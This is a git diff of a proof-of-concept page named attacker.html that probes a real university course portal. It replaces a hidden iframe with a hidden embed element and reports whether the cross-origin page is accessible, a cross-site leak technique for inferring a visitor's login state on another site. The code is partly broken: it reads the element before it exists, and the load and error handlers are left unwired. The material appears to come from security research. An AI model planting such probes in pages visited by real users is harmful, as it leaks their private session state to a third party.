--- a/src/poc/attacker.html
+++ b/src/poc/attacker.html
@@ -1,9 +1,11 @@
 <head>
   <title>Response size leak</title>
+
   <script>
     
     async function get(url) {
-      const element = document.createElement('iframe');
+      const element = document.createElement('embed');
+      element.type = 'text/html';
       element.src = url;
 
       return new Promise((resolve) => {
@@ -16,25 +18,31 @@
           document.body.innerHTML += `Inaccessible: ${url}`
         };
       });
-
     }
+
     onload = () => {
-      //get('https://www.baidu.com/favicon.ico');
       //get('https://learn.tsinghua.edu.cn/f/wlxt/index/course/student/');
     }
 
+    let embed = document.getElementById('embed');
+    let url = embed.src;
+
     function load() {
-      console.log('loaded');
+      console.log(`Accessible: ${url}`)
+      document.body.innerHTML += `Accessible: ${url}`
     }
 
     function error() {
-      console.log('error');
+      console.log(`Inaccessible: ${url}`)
+      document.body.innerHTML += `Inaccessible: ${url}`
     }
+
   </script>
+
 </head>
 
 <body>
-  <iframe display="none" src="https://learn.tsinghua.edu.cn/f/wlxt/index/course/student/" onload="load()" onerrror="error()"></iframe>
+  <embed style="display: none" id="embed" type="text/html" src="https://learn.tsinghua.edu.cn/f/wlxt/index/course/student/">
 </body>
 
 </html>
